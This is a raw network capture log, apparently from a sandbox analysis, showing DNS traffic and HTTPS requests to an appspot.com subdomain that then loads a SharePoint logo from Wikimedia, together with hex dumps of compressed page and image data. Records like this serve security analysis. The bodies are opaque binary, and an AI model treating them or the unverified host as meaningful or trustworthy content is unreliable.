Jan 15, 2025 15:12:11.480890036 CET	53944	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:12:11.484368086 CET	53	55221	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:11.484860897 CET	53	63351	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:11.487710953 CET	53	56791	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:11.489274025 CET	53	53944	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:12.687051058 CET	57046	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:12:12.687179089 CET	61150	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:12:12.694349051 CET	53	57046	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:12.694566011 CET	53	60881	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:12.694680929 CET	53	61150	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:12.705813885 CET	63762	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:12:12.706126928 CET	58956	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:12:12.712563992 CET	53	63762	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:12.712681055 CET	53	58956	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:12.915719032 CET	53421	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:12:12.916595936 CET	52619	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:12:12.922373056 CET	53	53421	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:12.923641920 CET	53	52619	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:12.927758932 CET	51910	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:12:12.928090096 CET	56909	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:12:12.934473991 CET	53	51910	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:12.934715986 CET	53	56909	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:13.945247889 CET	54371	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:12:13.945410013 CET	55612	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:12:13.952637911 CET	53	54371	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:13.953043938 CET	53	55612	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:14.693268061 CET	60577	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:12:14.693443060 CET	59280	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:12:14.699856997 CET	53	60577	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:14.700745106 CET	53	59280	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:15.822458982 CET	56533	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:12:15.822907925 CET	52737	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:12:16.298098087 CET	50513	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:12:16.298270941 CET	58731	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:12:16.305294037 CET	53	50513	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:16.305824995 CET	53	58731	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:24.577879906 CET	53	57342	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:27.683548927 CET	51305	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:12:27.683681965 CET	52931	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:12:27.702807903 CET	53	52931	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:27.709151030 CET	53	51305	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:32.786464930 CET	59745	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:12:32.786758900 CET	60024	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:12:32.863075018 CET	59087	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:12:32.863487959 CET	54079	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:12:32.887291908 CET	53	59087	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:32.887849092 CET	53	54079	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:46.578735113 CET	138	138	192.168.2.7	192.168.2.255
Jan 15, 2025 15:12:46.933372974 CET	53	53295	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:47.030821085 CET	58889	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:12:47.031120062 CET	61572	53	192.168.2.7	1.1.1.1
Jan 15, 2025 15:12:47.039519072 CET	53	61572	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:47.192862034 CET	53	58889	1.1.1.1	192.168.2.7
Jan 15, 2025 15:12:47.394844055 CET	53	54744	1.1.1.1	192.168.2.7

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:11:53 UTC	707	OUT	GET / HTTP/1.1 Host: guidantmeasurement-dot-level-district-447409-i0.as.r.appspot.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:11:53 UTC	387	IN	HTTP/1.1 200 OK X-Cloud-Trace-Context: c6cf240d3dad98884848ff8ee66b76db Content-Encoding: gzip Server: Google Frontend Content-Length: 8567 Date: Wed, 15 Jan 2025 14:05:40 GMT Expires: Wed, 15 Jan 2025 14:15:40 GMT Cache-Control: public, max-age=600 Age: 373 ETag: "lLH3ng" Content-Type: text/html Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-01-15 14:11:53 UTC	1003	IN	Data Raw: 1f 8b 08 00 00 00 00 00 02 ff ec 3d 6b 73 e2 b8 b2 df f3 2b 7c 33 35 35 33 3b 01 0c 04 c2 63 67 6b 49 42 08 33 81 04 12 f2 e0 d4 d6 29 63 1b 70 f0 83 b5 4d 08 a4 f8 41 f7 6f dc 5f 76 5b 4f cb 0f 32 9e 99 3d 67 f7 9c 05 2a c4 96 5a 2d 75 ab d5 ea 6e c9 d6 de cf ff 73 7a 79 72 f3 70 d5 94 a6 be 65 fe b2 f7 33 fa 27 a9 a6 e2 79 9f f6 f7 25 cd 70 3f ed 9b be bb 2f 99 8a 3d f9 b4 af db fb 08 46 57 34 f8 67 e9 be 22 a9 53 c5 f5 74 ff d3 fe c2 1f 67 2a fb 39 9e ee d8 be 6e 43 7a bb f9 49 d7 26 fa 3e 54 e0 cf 33 fa ef 0b e3 e9 d3 fe 7d 66 d0 c8 9c 38 d6 5c f1 8d 91 a9 27 14 5b 1a 9a 3f fd a4 e9 4f 86 aa 67 f0 cd 81 64 d8 86 6f 28 66 c6 53 15 53 ff 94 cf ca 07 92 a5 3c 1b d6 c2 a2 49 05 94 b4 f0 74 17 df 2b 80 f9 d3 4a f7 f6 25 5b b1 f4 4f fb 4f 86 be 9c 3b ae 1f Data Ascii: =ks+\|3553;cgkIB3)cpMAo_v[O2=gZ-unszyrpe3'y%p?/=FW4g"Stg9nCzI&>T3}f8\'[?Ogdo(fSS<It+J%[OO;
2025-01-15 14:11:53 UTC	1390	IN	Data Raw: f7 58 0e b2 d5 e2 51 c9 d5 ad 3a 52 30 99 29 01 c9 67 0b 38 8d 8e 4a 18 6e a0 68 ac 5a b6 50 38 02 69 64 a9 be 33 67 49 31 75 f6 66 3c 1e 83 9a 23 4a e9 8d aa aa 75 ac 74 34 5d 75 5c c5 37 1c 9b 68 1d a5 06 d5 ce 18 98 2c 97 8f 46 15 18 1d 4f 06 d2 cd 5a 2c 9d 68 43 8a b4 5c 2e f3 81 44 93 38 02 a2 3f 59 f9 6a b5 ba f9 95 8a b9 aa 87 54 fb bb a8 c0 bf ab 7b ae 5a 33 1d 18 3f ef f9 68 d8 ff b0 85 83 68 c2 00 4a 90 7c ff 58 0d d2 b5 6e 19 30 08 b4 48 55 65 de 59 62 55 59 d7 59 32 ad 86 af 89 62 a3 33 6d 6d 5f da af 6b 86 37 07 49 ac f9 68 ba de 88 40 26 e8 70 50 a8 fe 74 93 05 b6 65 9e bd 4c e1 f0 00 5f 5a 1a 5c be cc 1d 60 3e ea 21 17 c6 0c 9a 86 ea 96 61 73 c9 10 fa df d4 c7 7e 0d a9 27 26 10 2e 96 2f 48 11 30 bf 8c 4d 47 f1 6b 08 56 4c c5 a6 07 9e 38 37 Data Ascii: XQ:R0)g8JnhZP8id3gI1uf<#Jut4]u\7h,FOZ,hC\.D8?YjT{Z3?hhJ\|Xn0HUeYbUYY2b3mm_k7Ih@&pPteL_Z\`>!as~'&./H0MGkVL87
2025-01-15 14:11:53 UTC	1390	IN	Data Raw: 1f 8e 48 19 41 98 6e e1 eb 75 3a d7 52 1e 87 88 e3 d6 3d 0a 45 43 04 b5 be 86 95 2c 58 bc ac 55 ab 75 95 47 50 c5 c8 68 01 62 96 ac ae ec 54 f1 32 01 a5 22 77 14 73 a9 ac 90 e5 86 d1 7e c5 00 2c 7f d8 20 cb 89 10 d0 75 34 9d 2f 21 d6 49 44 14 1b 44 ac 56 1c fd 04 d7 86 c2 67 c0 bb b1 04 a3 0c f9 4b a1 28 3f 6a 71 92 13 c4 c6 4b c8 f3 12 87 0d 2a 17 1a 35 02 e9 49 8d c8 6a fa 68 31 21 ed c1 6e 58 64 19 00 3a 02 96 be 60 75 19 05 43 60 b5 0f ac cb 70 43 51 cb 23 ae 18 88 23 89 c9 13 83 14 8d 73 1c e1 a7 8b 1c 10 37 7f 8d 2d a9 3b e8 80 31 93 c6 d6 d9 2d e2 ad 40 56 6a 7c 4c 9b e2 28 23 98 2e 20 97 8c dd 38 52 1f f8 b1 5c 4a 85 71 26 0c bf 4d 96 ac eb 85 8b 67 54 f0 46 a3 ac a2 0b 80 59 0f 56 03 41 8a d1 e2 29 95 a3 57 b5 20 1f 2f c1 3a 00 57 b4 87 87 32 30 Data Ascii: HAnu:R=EC,XUuGPhbT2"ws~, u4/!IDDVgK(?jqK*5Ijh1!nXd:`uC`pCQ##s7-;1-@Vj\|L(#. 8R\Jq&MgTFYVA)W /:W20
2025-01-15 14:11:53 UTC	1390	IN	Data Raw: 9c e8 26 46 18 cd a6 73 fc 88 0a 8b ee a5 8a 21 84 3b 2c be 93 8f 8a 58 68 10 85 37 d0 c5 30 50 33 1b a7 8b 7b 38 93 51 41 18 c3 f0 4d 3d 64 7b e5 b3 64 73 3c 93 2e 3a 47 14 b2 c5 72 11 39 be 2c 1d 4d 9c 3c 91 72 8f 2e 98 e1 a8 34 09 52 67 f1 a6 fa 48 98 9a e1 80 88 9a a0 8a 13 4c 44 6c 4a d1 5d ec f8 b1 a4 60 7b fa ee b1 8c ff c8 c7 32 36 d9 b9 02 4b 8f 64 7f 07 da cb 13 d8 56 2c e6 1e 03 c1 b3 05 f3 13 60 8d 09 fb 1d 42 3c 26 7f 04 16 c9 26 0b 4f fe 4c 7d 34 db e2 35 b0 f8 9c 82 fd 89 60 eb 08 5f de ca e4 99 fd 86 22 fa c2 7a 43 c2 c2 04 b1 16 e9 22 1a d6 09 e4 b9 01 58 3c 94 b2 25 4f a2 0b e8 75 d8 6d f3 5a 2e 5a d0 7e 2d 5f 74 96 13 2b 00 1e b9 ce 13 f0 24 13 f0 41 74 75 60 06 e6 0f 19 20 9f 7c 0a bc c1 33 a1 0b 0f 04 7e 78 21 66 66 72 a0 2b 06 ce 1e Data Ascii: &Fs!;,Xh70P3{8QAM=d{ds<.:Gr9,M<r.4RgHLDlJ]`{26KdV,`B<&&OL}45`_"zC"X<%OumZ.Z~-_t+$Atu` \|3~x!ffr+
2025-01-15 14:11:53 UTC	1390	IN	Data Raw: 13 25 c1 a7 dc 90 1b 8d ce a1 03 97 cb 0e 94 c0 9f d6 a4 d5 68 9c 14 ba 00 db 3e 61 e5 4f 9d 06 dc 9f 3f 02 fc f1 e4 21 28 8f ae 86 a8 58 af c9 ca 9f 4c e0 ea 74 d1 83 9a 51 9d 8d 36 fa 81 0f 6a 49 af c1 8a 92 3c 9c 91 f4 73 9a cb e5 2a 8d a3 32 2a 74 52 ca 2d 1b 8d 85 5d 69 b4 cd d3 55 12 74 8a 34 a3 9d ee 8b 38 74 da 59 a7 fb a6 c4 69 60 16 a4 c4 d9 59 a5 c5 8a a8 4e d7 4e 80 4a 47 bd d1 de d1 bf eb ff 9d fc a7 1c ab 69 47 ea 6e fc 83 aa 4a c9 d3 9d fe 4b 2b 55 3b fd bf 9b ff 76 f3 7f 4a 0e ec ec 9f 74 1c d8 d9 7f 3b fb 6f 67 ff a5 b4 55 d2 ce d4 3b fb 6f 67 ff ed ec df 94 33 f5 2e fe 91 6e a6 36 76 f6 ff 9f 6d ff a3 1e d8 7d fe be 1c b8 4d f9 19 00 8b 8e 9b fd 74 df b3 94 48 6f 11 df 53 e2 6c f6 d3 22 45 01 f7 74 ed 04 a8 b4 48 77 f4 ef fa 7f 27 ff 29 Data Ascii: %h>aO?!(XLtQ6jI<s2tR-]iUt48tYi`YNNJGiGnJK+U;vJt;ogU;og3.n6vm}MtHoSl"EtHw')
2025-01-15 14:11:53 UTC	1390	IN	Data Raw: 62 0d 08 8a 03 87 e2 b8 07 ec a2 a6 8c a1 cb 00 21 ed 13 57 d1 8c 85 57 93 4a 70 6c 2e 63 64 5e d6 ad 80 8f e4 0e 51 45 50 41 59 c6 54 c4 12 ca d9 40 46 c8 a9 e4 89 fd 88 85 0e 8e 72 05 d1 ac 49 99 2a 7c 50 45 b4 25 e8 5c 5e 49 ce 96 74 4b f2 1c 38 36 44 c2 67 66 17 4a a5 03 e8 59 f6 23 67 0f 3f f0 12 f8 ed f0 df 58 86 c9 e0 37 55 44 ba 57 2c f2 46 2e 56 8a 95 a3 fa 1e 3b 0c 02 8f ba b1 e3 5a 35 32 00 41 74 f5 e1 7b 19 1a 8b 8e 02 d8 9e bb 3d 87 61 e6 a7 a1 d4 24 d4 01 15 29 9f 2d 7b 92 61 8f 0d db f0 75 09 14 81 ae c0 18 4c 09 06 fd 98 70 64 07 41 fc b2 27 bf 85 de 65 15 0b 4d 73 1d 1f e8 79 2f 6b fa 04 28 da 9a b1 d9 3b fa 0a 86 7c 65 2b 0e 9e b5 d9 43 87 38 bf da 90 62 79 2b 1a 9e b5 41 23 51 38 7a e5 bf 95 46 7e 40 81 30 e1 90 91 7a 8c 27 22 36 3d 05 Data Ascii: b!WWJpl.cd^QEPAYT@FrI*\|PE%\^ItK86DgfJY#g?X7UDW,F.V;Z52At{=a$)-{auLpdA'eMsy/k(;\|e+C8by+A#Q8zF~@0z'"6=
2025-01-15 14:11:53 UTC	614	IN	Data Raw: e7 bd 8a dd ac fc 7e 53 ed 97 2f 86 67 17 fa 83 fc fc 70 6e 3f 59 e5 6a 2b 3f cd 75 1f ad fb cf f3 c7 bb c5 ec ba a5 1c 0e 5b ed f5 60 de fe 78 52 7c 7a 80 68 cc c7 93 72 77 51 be b7 ce 73 f7 cb c7 f9 50 ad b6 4b d6 6c b9 2e 7f a9 18 7d ff be 63 c2 ed 72 25 df 7c 19 de e6 86 d3 71 6e 36 d4 ca 93 aa 5c 54 66 cf 9f 57 dd 42 e5 72 59 5c 5d df 68 5f 7a f2 f5 6a a8 3c ce fb ab 2f e3 f5 95 9b 5f 76 5b 45 75 3d 78 2c f9 f9 e7 72 2b 77 33 9a 5e 7f 31 3b c3 df 8d be ba 98 ce 8a e5 d2 73 3b 57 58 3e 96 95 ee 47 79 f5 71 58 28 f5 ab 95 8b de dd 79 a5 a7 f7 bc 25 0a 1f 3f e7 66 b9 9b e7 67 08 05 c3 a7 69 9e dd cc ae 17 3d eb e4 e4 dd 07 70 7c 90 c7 97 01 4f 8b f9 1e 60 0f d5 25 89 79 36 60 1e 3d 4d eb 12 b3 c2 91 b7 20 85 3d 2e 89 3a 3a 60 1c e3 cc 27 dd 1d 9b ce b2 Data Ascii: ~S/gpn?Yj+?u[`xR\|zhrwQsPKl.}cr%\|qn6\TfWBrY\]h_zj</_v[Eu=x,r+w3^1;s;WX>GyqX(y%?fgi=p\|O`%y6`=M =.::`'

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:11:54 UTC	785	OUT	GET /wikipedia/commons/thumb/e/e1/Microsoft_Office_SharePoint_%282019%E2%80%93present%29.svg/1200px-Microsoft_Office_SharePoint_%282019%E2%80%93present%29.svg.png HTTP/1.1 Host: upload.wikimedia.org Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://guidantmeasurement-dot-level-district-447409-i0.as.r.appspot.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:11:54 UTC	1096	IN	HTTP/1.1 200 OK content-type: image/png content-disposition: inline;filename=UTF-8''Microsoft_Office_SharePoint_%282019%E2%80%93present%29.svg.png last-modified: Mon, 15 Jul 2024 08:36:41 GMT content-length: 69481 date: Wed, 15 Jan 2025 12:56:30 GMT server: envoy etag: 54cebb5e1827d5f83b2d6449d429772f age: 4523 x-cache: cp3075 hit, cp3075 hit/4 x-cache-status: hit-front server-timing: cache;desc="hit-front", host;desc="cp3075" strict-transport-security: max-age=106384710; includeSubDomains; preload report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] } nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0} x-client-ip: 8.46.123.189 x-content-type-options: nosniff access-control-allow-origin: access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache timing-allow-origin: * accept-ranges: bytes connection: close
2025-01-15 14:11:54 UTC	13802	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 b0 00 00 04 95 08 06 00 00 00 bc 40 27 4a 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 07 74 49 4d 45 07 e8 07 0f 08 24 28 16 ce e7 ed 00 00 80 00 49 44 41 54 78 da ec dd 77 bc 1d 55 bd ff ff f7 9a d9 7b 9f de 53 4f 7a 81 24 84 de 05 2c 34 0b 45 94 26 2a 55 31 48 0a 49 bc de eb f7 7a 8b e7 eb fd fe bc ea e5 12 48 28 26 a1 05 50 11 b0 51 54 9a a2 58 a8 22 20 bd 43 20 09 90 de 4e ce d9 7b d6 ef 8f 00 52 4e 72 f6 39 67 cf cc 9a 99 d7 f3 f1 f0 a1 52 f6 99 79 ef 99 35 6b 7d 32 eb 73 8c 00 00 00 b0 7d ff f2 2f Data Ascii: PNGIHDR@'JgAMAa cHRMz&u0`:pQ<bKGDtIME$(IDATxwU{SOz$,4E&*U1HIzH(&PQTX" C N{RNr9gRy5k}2s}/
2025-01-15 14:11:54 UTC	15296	IN	Data Raw: b7 a8 b8 65 b3 4a 5b ba 7a 1a 67 29 60 01 19 91 9c 02 16 85 ab c8 4e 81 3e 57 19 bf 08 58 6b f5 92 0f 01 85 7f 0d 51 b8 4a f2 01 f0 d6 15 83 29 90 44 7e 3e af 5c 4d ad 72 d5 d5 ca 55 55 2b 57 53 2d bf aa 5a c6 f3 08 27 8e ef 23 97 97 9f cb 2b 5f f7 be 91 35 08 54 da d2 a9 62 e7 7b fe e3 51 c1 02 b2 c1 fd 02 16 7d ae 22 3b 7c fa 5c 65 7c b1 c4 5a ab 8c 8c 08 29 fc eb 88 3e 57 49 3d 08 0a 57 0c a8 40 52 bc 53 ac aa ad 55 be a6 46 f9 9a 3a 79 79 7e 91 5d 12 18 cf db fa dd d5 d4 be fb 2f ef ad c5 4b 56 4b 7a 4c 32 0f 1a 05 0f 96 ac 1e 5c fe da 8b 4f a8 a3 23 20 35 20 3d dc 1e a9 79 eb 2a b2 c3 67 bb 60 86 2f 04 d6 59 65 64 44 48 e1 5f 47 bc 75 95 d4 03 a0 70 c5 80 0a b8 cc cb e7 94 af a9 53 be ae 4e f9 da 3a e5 6b 6a 64 7c 9f 60 d2 a7 59 d2 81 92 3d d0 ca c8 Data Ascii: eJ[zg)`N>WXkQJ)D~>\MrUU+WS-Z'#+_5Tb{Q}";\|\e\|Z)>WI=W@RSUF:yy~]/KVKzL2\O# 5 =y*g`/YedDH_GupSN:kjd\|`Y=
2025-01-15 14:11:54 UTC	15296	IN	Data Raw: 00 47 0f bb fc f2 c1 95 fa 3c 0a 58 15 99 9c b2 5d 30 c9 07 f0 e3 c7 9f e4 1e 08 59 6b 4d b5 2e f9 d4 c7 75 fb 17 3e a7 dd 86 0e 61 b0 c9 d4 50 42 9f ab 6d 7e c1 f4 b9 2a fb f0 d2 7d 3f 52 d5 07 00 00 a9 95 37 45 ff 0b 95 fa b0 6c 17 b0 28 5c 25 e4 14 6d a8 a7 f6 97 a5 af ea c5 b5 6b 19 5a 22 f0 b1 31 a3 f5 c0 97 4f d3 b5 9f fd b4 c6 36 35 65 70 c0 89 fc 32 8f f9 94 29 5c f5 f8 05 d3 e7 ca 81 e7 8d 0b f7 23 85 2b 00 00 90 01 46 14 b0 c2 9e bb 46 f0 01 ee e7 63 d3 79 10 ef ff 54 2b e9 ba 27 d8 46 18 dd f8 25 1d 3f 65 92 1e 3d eb 4b 9a 77 f8 a1 6a af af 57 a6 6f 26 fa 5c 85 9f bb 75 e8 38 e8 73 15 f3 3d e0 4a 9f 2b 0a 57 00 00 20 33 eb bf 7d 47 2c 5a b2 63 25 3e 2b 7b 05 2c de ba ea f7 1a 23 41 5f 52 9f 3f f5 8a 87 1f 55 60 59 50 44 a9 26 97 d3 ac 7d f6 d4 Data Ascii: G<X]0YkM.u>aPBm~*}?R7El(\%mkZ"1O65ep2)\#+FFcyT+'F%?e=KwjWo&\u8s=J+W 3}G,Zc%>+{,#A_R?U`YPD&}
2025-01-15 14:11:54 UTC	15296	IN	Data Raw: bb e5 e7 ba 79 cb a3 4a cb 76 41 0a 57 61 0f c7 76 41 20 6a 7e 36 ab ce 99 b3 d5 3a 79 aa 0e ed ed d6 c0 a1 5e 92 02 00 48 ae 82 60 83 9f 95 f3 f3 5e 78 b3 b2 3a 2c 5e 59 57 b6 0b da 92 de 82 c8 63 28 e3 74 88 25 8e 44 63 01 f0 52 ff f0 eb bb f5 f9 75 1b 54 f5 aa ab d0 8a 46 49 17 af 42 7a 31 55 0f 13 f2 76 41 9b e8 1b 5b c5 90 11 de 2c ca 1a 9a 1b 16 e2 91 c9 e5 34 e5 e4 b9 9a 71 fa 59 ca 35 35 93 10 00 40 ec 8c cc d3 5d ab ae 7d ac 9c 3f 13 42 01 ab 84 c2 55 ea e6 63 d6 81 26 ed 2f 49 ac 2b ab ae 28 5c 01 18 c5 ff 77 ef 5a 7d e8 17 bf ac fc 43 e9 58 e1 2a 1d 4d da 43 be 48 d6 6c e1 2a c2 9b 68 d9 85 2b 6e 5a 88 5f ae a9 59 33 4e 3f 4b 93 4f 3e 45 7e 26 4b 42 00 00 f1 31 f6 27 e5 fe 91 2a b6 10 b2 5d 30 d1 38 12 cf 31 7d ae 00 4c ec 1f ef be 57 1f f8 f9 Data Ascii: yJvAWavA j~6:y^H`^x:,^YWc(t%DcRuTFIBz1UvA[,4qY55@]}?BUc&/I+(\wZ}CXMCHlh+nZ_Y3N?KO>E~&KB1'*]081}LW
2025-01-15 14:11:54 UTC	9791	IN	Data Raw: 69 a4 00 00 e0 02 9b 1f 99 4a 16 50 93 3c ef 68 c3 f6 98 7a 5e 79 b9 9c b2 d3 a6 d7 d4 8a 26 0a 58 40 32 d8 42 88 18 3c 65 ad fd cb ae 1b af f9 01 a9 40 e4 73 20 52 00 00 48 da ab ef d8 dc 5a 1c 1e 6e 22 13 a8 35 26 9b 55 76 f2 94 d8 8a 57 7e 73 8b 72 d3 67 d4 dc 76 3c 0a 58 40 32 fc 0c 05 2c 44 e6 a0 ac 3e d0 3c 78 68 5e 37 c5 2b c4 84 d9 04 00 20 71 47 0e 75 9d 16 0c 0d 91 08 d4 14 af b9 59 99 b6 f6 98 0e 66 94 ed e8 94 df da 56 9b b9 62 1b 13 90 cc c3 5e 8e cf 1e 42 97 37 32 5f 2d 14 f4 a1 3d ef 58 be 97 74 20 d6 6b 1a 29 00 00 24 3e 13 ea da 75 9a 2d 16 49 04 6a 83 67 94 69 ef 88 af 59 7b 36 ab dc 94 a9 b5 d1 ac 7d b4 f8 33 59 c9 18 ce 1b 20 89 cb 95 cf e3 1e 42 64 ed cd 46 e6 2f 77 dd b8 fc 09 92 81 24 70 45 03 00 24 2e 1f 0c 9f a4 80 02 16 6a e0 61 Data Ascii: iJP<hz^y&X@2B<e@s RHZn"5&UvW~srgv<X@2,D><xh^7+ qGuYfVb^B72_-=Xt k)$>u-IjgiY{6}3Y BdF/w$pE$.ja

Timestamp	Bytes transferred	Direction	Data
2025-01-15 14:11:55 UTC	501	OUT	GET /wikipedia/commons/thumb/e/e1/Microsoft_Office_SharePoint_%282019%E2%80%93present%29.svg/1200px-Microsoft_Office_SharePoint_%282019%E2%80%93present%29.svg.png HTTP/1.1 Host: upload.wikimedia.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-15 14:11:55 UTC	1096	IN	HTTP/1.1 200 OK content-type: image/png content-disposition: inline;filename=UTF-8''Microsoft_Office_SharePoint_%282019%E2%80%93present%29.svg.png last-modified: Mon, 15 Jul 2024 08:36:41 GMT content-length: 69481 date: Wed, 15 Jan 2025 12:56:30 GMT server: envoy etag: 54cebb5e1827d5f83b2d6449d429772f age: 4524 x-cache: cp3075 hit, cp3075 hit/5 x-cache-status: hit-front server-timing: cache;desc="hit-front", host;desc="cp3075" strict-transport-security: max-age=106384710; includeSubDomains; preload report-to: { "group": "wm_nel", "max_age": 604800, "endpoints": [{ "url": "https://intake-logging.wikimedia.org/v1/events?stream=w3c.reportingapi.network_error&schema_uri=/w3c/reportingapi/network_error/1.0.0" }] } nel: { "report_to": "wm_nel", "max_age": 604800, "failure_fraction": 0.05, "success_fraction": 0.0} x-client-ip: 8.46.123.189 x-content-type-options: nosniff access-control-allow-origin: access-control-expose-headers: Age, Date, Content-Length, Content-Range, X-Content-Duration, X-Cache timing-allow-origin: * accept-ranges: bytes connection: close
2025-01-15 14:11:55 UTC	13802	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 04 b0 00 00 04 95 08 06 00 00 00 bc 40 27 4a 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 00 07 74 49 4d 45 07 e8 07 0f 08 24 28 16 ce e7 ed 00 00 80 00 49 44 41 54 78 da ec dd 77 bc 1d 55 bd ff ff f7 9a d9 7b 9f de 53 4f 7a 81 24 84 de 05 2c 34 0b 45 94 26 2a 55 31 48 0a 49 bc de eb f7 7a 8b e7 eb fd fe bc ea e5 12 48 28 26 a1 05 50 11 b0 51 54 9a a2 58 a8 22 20 bd 43 20 09 90 de 4e ce d9 7b d6 ef 8f 00 52 4e 72 f6 39 67 cf cc 9a 99 d7 f3 f1 f0 a1 52 f6 99 79 ef 99 35 6b 7d 32 eb 73 8c 00 00 00 b0 7d ff f2 2f Data Ascii: PNGIHDR@'JgAMAa cHRMz&u0`:pQ<bKGDtIME$(IDATxwU{SOz$,4E&*U1HIzH(&PQTX" C N{RNr9gRy5k}2s}/
